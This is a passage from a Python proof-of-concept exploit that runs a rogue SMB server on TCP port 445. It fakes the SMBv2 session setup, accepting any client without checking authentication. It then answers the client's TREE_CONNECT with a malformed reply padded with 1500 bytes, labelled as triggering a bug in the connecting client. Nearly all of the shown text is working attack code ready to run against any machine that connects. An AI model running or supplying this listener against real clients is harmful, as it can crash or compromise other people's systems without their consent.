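                                   SessionID="\x4d\x00\x00\x00\x00\x04\x00\x00",
                                   NTStatus="\x16\x00\x00\xc0")
                body = SMB2Session1Data()
                body.calculate()
                data = self._reply(head, body, "Session challenge SMBv2 packet sent.")

            # SESSION_SETUP, second leg: only the MessageId's low byte is
            # inspected; the client's authentication data is not checked
            # at all before the session is accepted.
            if data[16:18] == "\x01\x00" and GrabMessageID(data)[0:1] == "\x02":
                head = SMBv2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data),
                                   PID="\xff\xfe\x00\x00",
                                   CreditCharge=GrabCreditCharged(data),
                                   Credits=GrabCreditRequested(data),
                                   NTStatus="\x00\x00\x00\x00",
                                   SessionID=GrabSessionID(data))
                body = SMB2SessionAcceptData()
                body.calculate()
                data = self._reply(head, body, "Session accepted SMBv2 packet sent.")

            # TREE_CONNECT (command 3): the response padded with 1500 bytes
            # is the malformed reply this script exists to send.
            if data[16:18] == "\x03\x00":
                head = SMBv2Header(Cmd="\x03\x00", MessageId=GrabMessageID(data),
                                   PID="\xff\xfe\x00\x00", TID="\x01\x00\x00\x00",
                                   CreditCharge=GrabCreditCharged(data),
                                   Credits=GrabCreditRequested(data),
                                   NTStatus="\x00\x00\x00\x00",
                                   SessionID=GrabSessionID(data))
                body = SMB2TreeData(Data="C" * 1500)  # //BUG
                data = self._reply(head, body,
                                   "Triggering Bug; Tree Connect SMBv2 packet sent.")

        except Exception as err:
            # Timeouts, resets and malformed requests all land here; say
            # why instead of pretending it was a clean disconnect.
            sys.stdout.write("Disconnected from %s (%s: %s)\n"
                             % (self.client_address, type(err).__name__, err))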

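def main():
    """Listen on TCP/445 on every interface and serve ``SMB2`` handlers forever.

    Port 445 is privileged and is normally held by the host's own SMB
    service (smbd, or the Windows Server service), which must be stopped
    or rebound first.  This listener sends every connecting client a
    response designed to trigger a bug in it; run it only on a network
    where that is authorised.

    The listener is started only when the file is executed as a script,
    so importing the module (for the packet classes, or by a test runner)
    no longer binds port 445 and blocks in ``serve_forever``.
    """
    SocketServer.TCPServer.allow_reuse_address = 1
    launch = SocketServer.TCPServer(('', 445), SMB2)
    launch.serve_forever()


if __name__ == "__main__":
    main()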

